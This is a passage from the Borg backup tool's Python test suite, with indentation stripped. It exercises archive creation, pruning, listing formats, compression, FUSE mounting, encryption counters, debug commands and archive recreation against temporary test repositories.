assert 'last_modified' in create_info['repository']
archive = create_info['archive']
assert archive['name'] == 'test'
assert isinstance(archive['command_line'], list)
assert isinstance(archive['duration'], float)
assert len(archive['id']) == 64
assert 'stats' in archive
def test_create_topical(self):
self.create_regular_file('file1', size=1024 * 80)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
# no listing by default
output = self.cmd('create', self.repository_location + '::test', 'input')
self.assert_not_in('file1', output)
# shouldn't be listed even if unchanged
output = self.cmd('create', self.repository_location + '::test0', 'input')
self.assert_not_in('file1', output)
# should list the file as unchanged
output = self.cmd('create', '--list', '--filter=U', self.repository_location + '::test1', 'input')
self.assert_in('file1', output)
# should *not* list the file as changed
output = self.cmd('create', '--list', '--filter=AM', self.repository_location + '::test2', 'input')
self.assert_not_in('file1', output)
# change the file
self.create_regular_file('file1', size=1024 * 100)
# should list the file as changed
output = self.cmd('create', '--list', '--filter=AM', self.repository_location + '::test3', 'input')
self.assert_in('file1', output)
@pytest.mark.skipif(not are_fifos_supported(), reason='FIFOs not supported')
def test_create_read_special_symlink(self):
from threading import Thread
def fifo_feeder(fifo_fn, data):
fd = os.open(fifo_fn, os.O_WRONLY)
try:
os.write(fd, data)
finally:
os.close(fd)
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test'
data = b'foobar' * 1000
fifo_fn = os.path.join(self.input_path, 'fifo')
link_fn = os.path.join(self.input_path, 'link_fifo')
os.mkfifo(fifo_fn)
os.symlink(fifo_fn, link_fn)
t = Thread(target=fifo_feeder, args=(fifo_fn, data))
t.start()
try:
self.cmd('create', '--read-special', archive, 'input/link_fifo')
finally:
t.join()
with changedir('output'):
self.cmd('extract', archive)
fifo_fn = 'input/link_fifo'
with open(fifo_fn, 'rb') as f:
extracted_data = f.read()
assert extracted_data == data
def test_create_read_special_broken_symlink(self):
os.symlink('somewhere doesnt exist', os.path.join(self.input_path, 'link'))
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test'
self.cmd('create', '--read-special', archive, 'input')
output = self.cmd('list', archive)
assert 'input/link -> somewhere doesnt exist' in output
# def test_cmdline_compatibility(self):
# self.create_regular_file('file1', size=1024 * 80)
# self.cmd('init', '--encryption=repokey', self.repository_location)
# self.cmd('create', self.repository_location + '::test', 'input')
# output = self.cmd('foo', self.repository_location, '--old')
# self.assert_in('"--old" has been deprecated. Use "--new" instead', output)
def test_prune_repository(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', src_dir)
self.cmd('create', self.repository_location + '::test2', src_dir)
# these are not really a checkpoints, but they look like some:
self.cmd('create', self.repository_location + '::test3.checkpoint', src_dir)
self.cmd('create', self.repository_location + '::test3.checkpoint.1', src_dir)
self.cmd('create', self.repository_location + '::test4.checkpoint', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=2')
assert re.search(r'Would prune:\s+test1', output)
# must keep the latest non-checkpoint archive:
assert re.search(r'Keeping archive \(rule: daily #1\):\s+test2', output)
# must keep the latest checkpoint archive:
assert re.search(r'Keeping checkpoint archive:\s+test4.checkpoint', output)
output = self.cmd('list', self.repository_location)
self.assert_in('test1', output)
self.assert_in('test2', output)
self.assert_in('test3.checkpoint', output)
self.assert_in('test3.checkpoint.1', output)
self.assert_in('test4.checkpoint', output)
self.cmd('prune', self.repository_location, '--keep-daily=2')
output = self.cmd('list', self.repository_location)
self.assert_not_in('test1', output)
# the latest non-checkpoint archive must be still there:
self.assert_in('test2', output)
# only the latest checkpoint archive must still be there:
self.assert_not_in('test3.checkpoint', output)
self.assert_not_in('test3.checkpoint.1', output)
self.assert_in('test4.checkpoint', output)
# now we supercede the latest checkpoint by a successful backup:
self.cmd('create', self.repository_location + '::test5', src_dir)
self.cmd('prune', self.repository_location, '--keep-daily=2')
output = self.cmd('list', self.repository_location)
# all checkpoints should be gone now:
self.assert_not_in('checkpoint', output)
# the latest archive must be still there
self.assert_in('test5', output)
def test_prune_repository_save_space(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', src_dir)
self.cmd('create', self.repository_location + '::test2', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=2')
assert re.search(r'Keeping archive \(rule: daily #1\):\s+test2', output)
assert re.search(r'Would prune:\s+test1', output)
output = self.cmd('list', self.repository_location)
self.assert_in('test1', output)
self.assert_in('test2', output)
self.cmd('prune', '--save-space', self.repository_location, '--keep-daily=2')
output = self.cmd('list', self.repository_location)
self.assert_not_in('test1', output)
self.assert_in('test2', output)
def test_prune_repository_prefix(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::foo-2015-08-12-10:00', src_dir)
self.cmd('create', self.repository_location + '::foo-2015-08-12-20:00', src_dir)
self.cmd('create', self.repository_location + '::bar-2015-08-12-10:00', src_dir)
self.cmd('create', self.repository_location + '::bar-2015-08-12-20:00', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=2', '--prefix=foo-')
assert re.search(r'Keeping archive \(rule: daily #1\):\s+foo-2015-08-12-20:00', output)
assert re.search(r'Would prune:\s+foo-2015-08-12-10:00', output)
output = self.cmd('list', self.repository_location)
self.assert_in('foo-2015-08-12-10:00', output)
self.assert_in('foo-2015-08-12-20:00', output)
self.assert_in('bar-2015-08-12-10:00', output)
self.assert_in('bar-2015-08-12-20:00', output)
self.cmd('prune', self.repository_location, '--keep-daily=2', '--prefix=foo-')
output = self.cmd('list', self.repository_location)
self.assert_not_in('foo-2015-08-12-10:00', output)
self.assert_in('foo-2015-08-12-20:00', output)
self.assert_in('bar-2015-08-12-10:00', output)
self.assert_in('bar-2015-08-12-20:00', output)
def test_prune_repository_glob(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::2015-08-12-10:00-foo', src_dir)
self.cmd('create', self.repository_location + '::2015-08-12-20:00-foo', src_dir)
self.cmd('create', self.repository_location + '::2015-08-12-10:00-bar', src_dir)
self.cmd('create', self.repository_location + '::2015-08-12-20:00-bar', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=2', '--glob-archives=2015-*-foo')
assert re.search(r'Keeping archive \(rule: daily #1\):\s+2015-08-12-20:00-foo', output)
assert re.search(r'Would prune:\s+2015-08-12-10:00-foo', output)
output = self.cmd('list', self.repository_location)
self.assert_in('2015-08-12-10:00-foo', output)
self.assert_in('2015-08-12-20:00-foo', output)
self.assert_in('2015-08-12-10:00-bar', output)
self.assert_in('2015-08-12-20:00-bar', output)
self.cmd('prune', self.repository_location, '--keep-daily=2', '--glob-archives=2015-*-foo')
output = self.cmd('list', self.repository_location)
self.assert_not_in('2015-08-12-10:00-foo', output)
self.assert_in('2015-08-12-20:00-foo', output)
self.assert_in('2015-08-12-10:00-bar', output)
self.assert_in('2015-08-12-20:00-bar', output)
def test_list_prefix(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test-1', src_dir)
self.cmd('create', self.repository_location + '::something-else-than-test-1', src_dir)
self.cmd('create', self.repository_location + '::test-2', src_dir)
output = self.cmd('list', '--prefix=test-', self.repository_location)
self.assert_in('test-1', output)
self.assert_in('test-2', output)
self.assert_not_in('something-else', output)
def test_list_format(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, src_dir)
output_1 = self.cmd('list', test_archive)
output_2 = self.cmd('list', '--format', '{mode} {user:6} {group:6} {size:8d} {mtime} {path}{extra}{NEWLINE}', test_archive)
output_3 = self.cmd('list', '--format', '{mtime:%s} {path}{NL}', test_archive)
self.assertEqual(output_1, output_2)
self.assertNotEqual(output_1, output_3)
def test_list_repository_format(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--comment', 'comment 1', self.repository_location + '::test-1', src_dir)
self.cmd('create', '--comment', 'comment 2', self.repository_location + '::test-2', src_dir)
output_1 = self.cmd('list', self.repository_location)
output_2 = self.cmd('list', '--format', '{archive:<36} {time} [{id}]{NL}', self.repository_location)
self.assertEqual(output_1, output_2)
output_1 = self.cmd('list', '--short', self.repository_location)
self.assertEqual(output_1, 'test-1\ntest-2\n')
output_1 = self.cmd('list', '--format', '{barchive}/', self.repository_location)
self.assertEqual(output_1, 'test-1/test-2/')
output_3 = self.cmd('list', '--format', '{name} {comment}{NL}', self.repository_location)
self.assert_in('test-1 comment 1\n', output_3)
self.assert_in('test-2 comment 2\n', output_3)
def test_list_hash(self):
self.create_regular_file('empty_file', size=0)
self.create_regular_file('amb', contents=b'a' * 1000000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, 'input')
output = self.cmd('list', '--format', '{sha256} {path}{NL}', test_archive)
assert "cdc76e5c9914fb9281a1c7e284d73e67f1809a48a497200e046d39ccc7112cd0 input/amb" in output
assert "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 input/empty_file" in output
def test_list_chunk_counts(self):
self.create_regular_file('empty_file', size=0)
self.create_regular_file('two_chunks')
with open(os.path.join(self.input_path, 'two_chunks'), 'wb') as fd:
fd.write(b'abba' * 2000000)
fd.write(b'baab' * 2000000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, 'input')
output = self.cmd('list', '--format', '{num_chunks} {unique_chunks} {path}{NL}', test_archive)
assert "0 0 input/empty_file" in output
assert "2 2 input/two_chunks" in output
def test_list_size(self):
self.create_regular_file('compressible_file', size=10000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', '-C', 'lz4', test_archive, 'input')
output = self.cmd('list', '--format', '{size} {csize} {dsize} {dcsize} {path}{NL}', test_archive)
size, csize, dsize, dcsize, path = output.split("\n")[1].split(" ")
assert int(csize) < int(size)
assert int(dcsize) < int(dsize)
assert int(dsize) <= int(size)
assert int(dcsize) <= int(csize)
def test_list_json(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
list_repo = json.loads(self.cmd('list', '--json', self.repository_location))
repository = list_repo['repository']
assert len(repository['id']) == 64
assert datetime.strptime(repository['last_modified'], ISO_FORMAT) # must not raise
assert list_repo['encryption']['mode'] == 'repokey'
assert 'keyfile' not in list_repo['encryption']
archive0 = list_repo['archives'][0]
assert datetime.strptime(archive0['time'], ISO_FORMAT) # must not raise
list_archive = self.cmd('list', '--json-lines', self.repository_location + '::test')
items = [json.loads(s) for s in list_archive.splitlines()]
assert len(items) == 2
file1 = items[1]
assert file1['path'] == 'input/file1'
assert file1['size'] == 81920
assert datetime.strptime(file1['mtime'], ISO_FORMAT) # must not raise
list_archive = self.cmd('list', '--json-lines', '--format={sha256}', self.repository_location + '::test')
items = [json.loads(s) for s in list_archive.splitlines()]
assert len(items) == 2
file1 = items[1]
assert file1['path'] == 'input/file1'
assert file1['sha256'] == 'b2915eb69f260d8d3c25249195f2c8f4f716ea82ec760ae929732c0262442b2b'
def test_list_json_args(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('list', '--json-lines', self.repository_location, exit_code=2)
self.cmd('list', '--json', self.repository_location + '::archive', exit_code=2)
def test_log_json(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
log = self.cmd('create', '--log-json', self.repository_location + '::test', 'input', '--list', '--debug')
messages = {} # type -> message, one of each kind
for line in log.splitlines():
msg = json.loads(line)
messages[msg['type']] = msg
file_status = messages['file_status']
assert 'status' in file_status
assert file_status['path'].startswith('input')
log_message = messages['log_message']
assert isinstance(log_message['time'], float)
assert log_message['levelname'] == 'DEBUG' # there should only be DEBUG messages
assert isinstance(log_message['message'], str)
def test_debug_profile(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', '--debug-profile=create.prof')
self.cmd('debug', 'convert-profile', 'create.prof', 'create.pyprof')
stats = pstats.Stats('create.pyprof')
stats.strip_dirs()
stats.sort_stats('cumtime')
self.cmd('create', self.repository_location + '::test2', 'input', '--debug-profile=create.pyprof')
stats = pstats.Stats('create.pyprof') # Only do this on trusted data!
stats.strip_dirs()
stats.sort_stats('cumtime')
def test_common_options(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
log = self.cmd('--debug', 'create', self.repository_location + '::test', 'input')
assert 'security: read previous location' in log
def _get_sizes(self, compression, compressible, size=10000):
if compressible:
contents = b'X' * size
else:
contents = os.urandom(size)
self.create_regular_file('file', contents=contents)
self.cmd('init', '--encryption=none', self.repository_location)
archive = self.repository_location + '::test'
self.cmd('create', '-C', compression, archive, 'input')
output = self.cmd('list', '--format', '{size} {csize} {path}{NL}', archive)
size, csize, path = output.split("\n")[1].split(" ")
return int(size), int(csize)
def test_compression_none_compressible(self):
size, csize = self._get_sizes('none', compressible=True)
assert csize >= size
assert csize == size + 3
def test_compression_none_uncompressible(self):
size, csize = self._get_sizes('none', compressible=False)
assert csize >= size
assert csize == size + 3
def test_compression_zlib_compressible(self):
size, csize = self._get_sizes('zlib', compressible=True)
assert csize < size * 0.1
assert csize == 35
def test_compression_zlib_uncompressible(self):
size, csize = self._get_sizes('zlib', compressible=False)
assert csize >= size
def test_compression_auto_compressible(self):
size, csize = self._get_sizes('auto,zlib', compressible=True)
assert csize < size * 0.1
assert csize == 35 # same as compression 'zlib'
def test_compression_auto_uncompressible(self):
size, csize = self._get_sizes('auto,zlib', compressible=False)
assert csize >= size
assert csize == size + 3 # same as compression 'none'
def test_compression_lz4_compressible(self):
size, csize = self._get_sizes('lz4', compressible=True)
assert csize < size * 0.1
def test_compression_lz4_uncompressible(self):
size, csize = self._get_sizes('lz4', compressible=False)
assert csize >= size
def test_compression_lzma_compressible(self):
size, csize = self._get_sizes('lzma', compressible=True)
assert csize < size * 0.1
def test_compression_lzma_uncompressible(self):
size, csize = self._get_sizes('lzma', compressible=False)
assert csize >= size
def test_change_passphrase(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
os.environ['BORG_NEW_PASSPHRASE'] = 'newpassphrase'
# here we have both BORG_PASSPHRASE and BORG_NEW_PASSPHRASE set:
self.cmd('key', 'change-passphrase', self.repository_location)
os.environ['BORG_PASSPHRASE'] = 'newpassphrase'
self.cmd('list', self.repository_location)
def test_break_lock(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('break-lock', self.repository_location)
def test_usage(self):
self.cmd()
self.cmd('-h')
def test_help(self):
assert 'Borg' in self.cmd('help')
assert 'patterns' in self.cmd('help', 'patterns')
assert 'Initialize' in self.cmd('help', 'init')
assert 'positional arguments' not in self.cmd('help', 'init', '--epilog-only')
assert 'This command initializes' not in self.cmd('help', 'init', '--usage-only')
@unittest.skipUnless(has_llfuse, 'llfuse not installed')
def test_fuse(self):
def has_noatime(some_file):
atime_before = os.stat(some_file).st_atime_ns
try:
os.close(os.open(some_file, flags_noatime))
except PermissionError:
return False
else:
atime_after = os.stat(some_file).st_atime_ns
noatime_used = flags_noatime != flags_normal
return noatime_used and atime_before == atime_after
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_test_files()
have_noatime = has_noatime('input/file1')
self.cmd('create', '--exclude-nodump', '--atime', self.repository_location + '::archive', 'input')
self.cmd('create', '--exclude-nodump', '--atime', self.repository_location + '::archive2', 'input')
if has_lchflags:
# remove the file we did not backup, so input and output become equal
os.remove(os.path.join('input', 'flagfile'))
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
# mount the whole repository, archive contents shall show up in archivename subdirs of mountpoint:
with self.fuse_mount(self.repository_location, mountpoint):
# bsdflags are not supported by the FUSE mount
# we also ignore xattrs here, they are tested separately
self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'archive', 'input'),
ignore_bsdflags=True, ignore_xattrs=True)
self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'archive2', 'input'),
ignore_bsdflags=True, ignore_xattrs=True)
# mount only 1 archive, its contents shall show up directly in mountpoint:
with self.fuse_mount(self.repository_location + '::archive', mountpoint):
self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'input'),
ignore_bsdflags=True, ignore_xattrs=True)
# regular file
in_fn = 'input/file1'
out_fn = os.path.join(mountpoint, 'input', 'file1')
# stat
sti1 = os.stat(in_fn)
sto1 = os.stat(out_fn)
assert sti1.st_mode == sto1.st_mode
assert sti1.st_uid == sto1.st_uid
assert sti1.st_gid == sto1.st_gid
assert sti1.st_size == sto1.st_size
if have_noatime:
assert sti1.st_atime == sto1.st_atime
assert sti1.st_ctime == sto1.st_ctime
assert sti1.st_mtime == sto1.st_mtime
# note: there is another hardlink to this, see below
assert sti1.st_nlink == sto1.st_nlink == 2
# read
with open(in_fn, 'rb') as in_f, open(out_fn, 'rb') as out_f:
assert in_f.read() == out_f.read()
# hardlink (to 'input/file1')
if are_hardlinks_supported():
in_fn = 'input/hardlink'
out_fn = os.path.join(mountpoint, 'input', 'hardlink')
sti2 = os.stat(in_fn)
sto2 = os.stat(out_fn)
assert sti2.st_nlink == sto2.st_nlink == 2
assert sto1.st_ino == sto2.st_ino
# symlink
if are_symlinks_supported():
in_fn = 'input/link1'
out_fn = os.path.join(mountpoint, 'input', 'link1')
sti = os.stat(in_fn, follow_symlinks=False)
sto = os.stat(out_fn, follow_symlinks=False)
assert sti.st_size == len('somewhere')
assert sto.st_size == len('somewhere')
assert stat.S_ISLNK(sti.st_mode)
assert stat.S_ISLNK(sto.st_mode)
assert os.readlink(in_fn) == os.readlink(out_fn)
# FIFO
if are_fifos_supported():
out_fn = os.path.join(mountpoint, 'input', 'fifo1')
sto = os.stat(out_fn)
assert stat.S_ISFIFO(sto.st_mode)
# list/read xattrs
try:
in_fn = 'input/fusexattr'
out_fn = os.fsencode(os.path.join(mountpoint, 'input', 'fusexattr'))
if not xattr.XATTR_FAKEROOT and xattr.is_enabled(self.input_path):
assert sorted(no_selinux(xattr.listxattr(out_fn))) == [b'user.empty', b'user.foo', ]
assert xattr.getxattr(out_fn, b'user.foo') == b'bar'
assert xattr.getxattr(out_fn, b'user.empty') == b''
else:
assert no_selinux(xattr.listxattr(out_fn)) == []
try:
xattr.getxattr(out_fn, b'user.foo')
except OSError as e:
assert e.errno == llfuse.ENOATTR
else:
assert False, "expected OSError(ENOATTR), but no error was raised"
except OSError as err:
if sys.platform.startswith(('nothing_here_now', )) and err.errno == errno.ENOTSUP:
# some systems have no xattr support on FUSE
pass
else:
raise
@unittest.skipUnless(has_llfuse, 'llfuse not installed')
def test_fuse_versions_view(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('test', contents=b'first')
if are_hardlinks_supported():
self.create_regular_file('hardlink1', contents=b'123456')
os.link('input/hardlink1', 'input/hardlink2')
os.link('input/hardlink1', 'input/hardlink3')
self.cmd('create', self.repository_location + '::archive1', 'input')
self.create_regular_file('test', contents=b'second')
self.cmd('create', self.repository_location + '::archive2', 'input')
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
# mount the whole repository, archive contents shall show up in versioned view:
with self.fuse_mount(self.repository_location, mountpoint, '-o', 'versions'):
path = os.path.join(mountpoint, 'input', 'test') # filename shows up as directory ...
files = os.listdir(path)
assert all(f.startswith('test.') for f in files) # ... with files test.xxxxx in there
assert {b'first', b'second'} == {open(os.path.join(path, f), 'rb').read() for f in files}
if are_hardlinks_supported():
hl1 = os.path.join(mountpoint, 'input', 'hardlink1', 'hardlink1.00001')
hl2 = os.path.join(mountpoint, 'input', 'hardlink2', 'hardlink2.00001')
hl3 = os.path.join(mountpoint, 'input', 'hardlink3', 'hardlink3.00001')
assert os.stat(hl1).st_ino == os.stat(hl2).st_ino == os.stat(hl3).st_ino
assert open(hl3, 'rb').read() == b'123456'
# similar again, but exclude the hardlink master:
with self.fuse_mount(self.repository_location, mountpoint, '-o', 'versions', '-e', 'input/hardlink1'):
if are_hardlinks_supported():
hl2 = os.path.join(mountpoint, 'input', 'hardlink2', 'hardlink2.00001')
hl3 = os.path.join(mountpoint, 'input', 'hardlink3', 'hardlink3.00001')
assert os.stat(hl2).st_ino == os.stat(hl3).st_ino
assert open(hl3, 'rb').read() == b'123456'
@unittest.skipUnless(has_llfuse, 'llfuse not installed')
def test_fuse_allow_damaged_files(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive')
# Get rid of a chunk and repair it
archive, repository = self.open_archive('archive')
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
repository.delete(item.chunks[-1].id)
path = item.path # store full path for later
break
else:
assert False # missed the file
repository.commit(compact=False)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
with self.fuse_mount(self.repository_location + '::archive', mountpoint):
with pytest.raises(OSError) as excinfo:
open(os.path.join(mountpoint, path))
assert excinfo.value.errno == errno.EIO
with self.fuse_mount(self.repository_location + '::archive', mountpoint, '-o', 'allow_damaged_files'):
open(os.path.join(mountpoint, path)).close()
@unittest.skipUnless(has_llfuse, 'llfuse not installed')
def test_fuse_mount_options(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('arch11')
self.create_src_archive('arch12')
self.create_src_archive('arch21')
self.create_src_archive('arch22')
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
with self.fuse_mount(self.repository_location, mountpoint, '--first=2', '--sort=name'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12']
with self.fuse_mount(self.repository_location, mountpoint, '--last=2', '--sort=name'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch21', 'arch22']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch1'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch2'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch21', 'arch22']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12', 'arch21', 'arch22']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=nope'):
assert sorted(os.listdir(os.path.join(mountpoint))) == []
def verify_aes_counter_uniqueness(self, method):
seen = set() # Chunks already seen
used = set() # counter values already used
def verify_uniqueness():
with Repository(self.repository_path) as repository:
for id, _ in repository.open_index(repository.get_transaction_id()).iteritems():
data = repository.get(id)
hash = sha256(data).digest()
if hash not in seen:
seen.add(hash)
num_blocks = num_cipher_blocks(len(data) - 41)
nonce = bytes_to_long(data[33:41])
for counter in range(nonce, nonce + num_blocks):
self.assert_not_in(counter, used)
used.add(counter)
self.create_test_files()
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=' + method, self.repository_location)
verify_uniqueness()
self.cmd('create', self.repository_location + '::test', 'input')
verify_uniqueness()
self.cmd('create', self.repository_location + '::test.2', 'input')
verify_uniqueness()
self.cmd('delete', self.repository_location + '::test.2')
verify_uniqueness()
def test_aes_counter_uniqueness_keyfile(self):
self.verify_aes_counter_uniqueness('keyfile')
def test_aes_counter_uniqueness_passphrase(self):
self.verify_aes_counter_uniqueness('repokey')
def test_debug_dump_archive_items(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('debug', 'dump-archive-items', self.repository_location + '::test')
output_dir = sorted(os.listdir('output'))
assert len(output_dir) > 0 and output_dir[0].startswith('000000_')
assert 'Done.' in output
def test_debug_dump_repo_objs(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('debug', 'dump-repo-objs', self.repository_location)
output_dir = sorted(os.listdir('output'))
assert len(output_dir) > 0 and output_dir[0].startswith('00000000_')
assert 'Done.' in output
def test_debug_put_get_delete_obj(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
data = b'some data'
hexkey = sha256(data).hexdigest()
self.create_regular_file('file', contents=data)
output = self.cmd('debug', 'put-obj', self.repository_location, 'input/file')
assert hexkey in output
output = self.cmd('debug', 'get-obj', self.repository_location, hexkey, 'output/file')
assert hexkey in output
with open('output/file', 'rb') as f:
data_read = f.read()
assert data == data_read
output = self.cmd('debug', 'delete-obj', self.repository_location, hexkey)
assert "deleted" in output
output = self.cmd('debug', 'delete-obj', self.repository_location, hexkey)
assert "not found" in output
output = self.cmd('debug', 'delete-obj', self.repository_location, 'invalid')
assert "is invalid" in output
def test_init_interrupt(self):
def raise_eof(*args):
raise EOFError
with patch.object(KeyfileKeyBase, 'create', raise_eof):
self.cmd('init', '--encryption=repokey', self.repository_location, exit_code=1)
assert not os.path.exists(self.repository_location)
def test_init_requires_encryption_option(self):
self.cmd('init', self.repository_location, exit_code=2)
def test_init_nested_repositories(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
if self.FORK_DEFAULT:
self.cmd('init', '--encryption=repokey', self.repository_location + '/nested', exit_code=2)
else:
with pytest.raises(Repository.AlreadyExists):
self.cmd('init', '--encryption=repokey', self.repository_location + '/nested')
def check_cache(self):
# First run a regular borg check
self.cmd('check', self.repository_location)
# Then check that the cache on disk matches exactly what's in the repo.
with self.open_repository() as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest, sync=False) as cache:
original_chunks = cache.chunks
Cache.destroy(repository)
with Cache(repository, key, manifest) as cache:
correct_chunks = cache.chunks
assert original_chunks is not correct_chunks
seen = set()
for id, (refcount, size, csize) in correct_chunks.iteritems():
o_refcount, o_size, o_csize = original_chunks[id]
assert refcount == o_refcount
assert size == o_size
assert csize == o_csize
seen.add(id)
for id, (refcount, size, csize) in original_chunks.iteritems():
assert id in seen
def test_check_cache(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with self.open_repository() as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest, sync=False) as cache:
cache.begin_txn()
cache.chunks.incref(list(cache.chunks.iteritems())[0][0])
cache.commit()
with pytest.raises(AssertionError):
self.check_cache()
def test_recreate_target_rc(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('recreate', self.repository_location, '--target=asdf', exit_code=2)
assert 'Need to specify single archive' in output
def test_recreate_target(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.check_cache()
archive = self.repository_location + '::test0'
self.cmd('create', archive, 'input')
self.check_cache()
original_archive = self.cmd('list', self.repository_location)
self.cmd('recreate', archive, 'input/dir2', '-e', 'input/dir2/file3', '--target=new-archive')
self.check_cache()
archives = self.cmd('list', self.repository_location)
assert original_archive in archives
assert 'new-archive' in archives
archive = self.repository_location + '::new-archive'
listing = self.cmd('list', '--short', archive)
assert 'file1' not in listing
assert 'dir2/file2' in listing
assert 'dir2/file3' not in listing
def test_recreate_basic(self):
self.create_test_files()
self.create_regular_file('dir2/file3', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test0'
self.cmd('create', archive, 'input')
self.cmd('recreate', archive, 'input/dir2', '-e', 'input/dir2/file3')
self.check_cache()
listing = self.cmd('list', '--short', archive)
assert 'file1' not in listing
assert 'dir2/file2' in listing
assert 'dir2/file3' not in listing
@pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')
def test_recreate_subtree_hardlinks(self):
# This is essentially the same problem set as in test_extract_hardlinks
self._extract_hardlinks_setup()
self.cmd('create', self.repository_location + '::test2', 'input')
self.cmd('recreate', self.repository_location + '::test', 'input/dir1')
self.check_cache()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
with changedir('output'):
self.cmd('extract', self.repository_location + '::test2')
assert os.stat('input/dir1/hardlink').st_nlink == 4
def test_recreate_rechunkify(self):
with open(os.path.join(self.input_path, 'large_file'), 'wb') as fd:
fd.write(b'a' * 280)
fd.write(b'b' * 280)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--chunker-params', '7,9,8,128', self.repository_location + '::test1', 'input')
self.cmd('create', self.repository_location + '::test2', 'input', '--files-cache=disabled')
list = self.cmd('list', self.repository_location + '::test1', 'input/large_file',
'--format', '{num_chunks} {unique_chunks}')
num_chunks, unique_chunks = map(int, list.split(' '))
# test1 and test2 do not deduplicate
assert num_chunks == unique_chunks
self.cmd('recreate', self.repository_location, '--chunker-params', 'default')
self.check_cache()
# test1 and test2 do deduplicate after recreate
assert int(self.cmd('list', self.repository_location + '::test1', 'input/large_file', '--format={size}'))
assert not int(self.cmd('list', self.repository_location + '::test1', 'input/large_file',
'--format', '{unique_chunks}'))
def test_recreate_recompress(self):
self.create_regular_file('compressible', size=10000)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', '-C', 'none')
file_list = self.cmd('list', self.repository_location + '::test', 'input/compressible',
'--format', '{size} {csize} {sha256}')
size, csize, sha256_before = file_list.split(' ')
assert int(csize) >= int(size) # >= due to metadata overhead
self.cmd('recreate', self.repository_location, '-C', 'lz4', '--recompress')
self.check_cache()
